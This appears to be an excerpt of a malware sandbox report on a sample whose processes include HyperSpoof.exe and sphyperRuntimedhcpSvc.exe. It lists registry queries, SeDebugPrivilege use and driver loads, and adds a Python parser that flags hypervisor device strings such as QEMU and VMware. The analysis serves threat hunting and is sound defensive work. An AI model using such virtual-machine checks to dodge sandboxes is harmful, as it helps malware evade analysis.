Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LocationInformation C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Control C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000C C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
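Every row in the table above is DevManView.exe (the NirSoft device-manager viewer dropped to C:\ProgramData) reading the SCSI enumerator keys, and the device IDs in those paths carry the vendor and product strings the detonation VM exposes. The following is an added example, not the sandbox's or the tool's own code, that parses such rows into devices, instances and queried properties and marks devices whose strings point at a hypervisor. The marker lists are assumptions of mine; "Msft Virtual DVD-ROM" is deliberately only a weak marker because Windows creates that same device on physical hardware whenever an ISO is mounted.

```python
import re

# Constructed input: a representative subset of the "Key ..." rows above,
# as (action, registry path). All of them were issued by DevManView.exe.
SCSI_ROWS = [
    ("Key value queried", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver"),
    ("Key queried", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr"),
    ("Key queried", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM"),
    ("Key value queried", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName"),
    ("Key value queried", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGUID"),
    ("Key enumerated", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI"),
    ("Key value queried", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service"),
    ("Key opened", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000C"),
]

# Layout of a Plug and Play enumeration key:
#   ...\Enum\<enumerator>\<device ID>\<instance ID>\<property or subkey path>
ENUM_RE = re.compile(
    r"^\\REGISTRY\\MACHINE\\SYSTEM\\(?P<cs>ControlSet\d+|CurrentControlSet)\\Enum\\"
    r"(?P<enumerator>[^\\]+)"
    r"(?:\\(?P<device>[^\\]+))?"
    r"(?:\\(?P<instance>[^\\]+))?"
    r"(?:\\(?P<rest>.*))?$",
    re.IGNORECASE,
)

# Assumed marker lists (mine): strings that only a hypervisor-backed device
# carries, versus strings that physical machines can also produce.
STRONG_VM_MARKERS = ("qemu", "vbox", "vmware", "virtio", "xen")
WEAK_VM_MARKERS = ("virtual", "msft")


def parse_device_id(device_id):
    """Split 'Disk&Ven_DADY&Prod_HARDDISK' into class, vendor, product, revision."""
    parts = device_id.split("&")
    info = {"class": parts[0], "vendor": None, "product": None, "revision": None}
    for part in parts[1:]:
        if part.startswith("Ven_"):
            info["vendor"] = part[4:]
        elif part.startswith("Prod_"):
            info["product"] = part[5:]
        elif part.startswith("Rev_"):
            info["revision"] = part[4:]
    return info


def vm_indicator(info):
    """'strong', 'weak' or None depending on the vendor/product strings."""
    text = " ".join(v for v in (info["vendor"], info["product"]) if v).lower()
    if any(m in text for m in STRONG_VM_MARKERS):
        return "strong"
    if any(m in text for m in WEAK_VM_MARKERS):
        return "weak"
    return None


def summarize(rows):
    """Group registry rows by device ID, collecting the instance IDs and the
    properties that were read, and tag each device with its VM indicator."""
    devices = {}
    for _action, key in rows:
        m = ENUM_RE.match(key)
        if not m or not m.group("device"):
            continue  # bus-level rows such as "Key enumerated ...\Enum\SCSI"
        dev = devices.get(m.group("device"))
        if dev is None:
            dev = devices[m.group("device")] = {
                **parse_device_id(m.group("device")),
                "enumerator": m.group("enumerator"),
                "instances": set(), "properties": set(), "rows": 0,
            }
        dev["rows"] += 1
        if m.group("instance"):
            dev["instances"].add(m.group("instance"))
        if m.group("rest"):
            dev["properties"].add(m.group("rest"))
    for dev in devices.values():
        dev["vm_indicator"] = vm_indicator(dev)
    return devices


if __name__ == "__main__":
    for device_id, dev in summarize(SCSI_ROWS).items():
        print(f"{device_id}: vendor={dev['vendor']} product={dev['product']} "
              f"vm={dev['vm_indicator']} instances={sorted(dev['instances'])} "
              f"properties={sorted(dev['properties'])}")
```

Run against the full table this gives three devices: one disk reporting as DADY HARDDISK with no hypervisor marker, a QEMU DVD-ROM (strong marker) and an Msft Virtual DVD-ROM (weak marker). For hunting, the interesting combination is a process that both reads these keys and, as here, runs from a user-writable directory under a renamed parent; DevManView on its own is a legitimate administration tool.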

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
N/A N/A C:\Windows\en-US\conhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
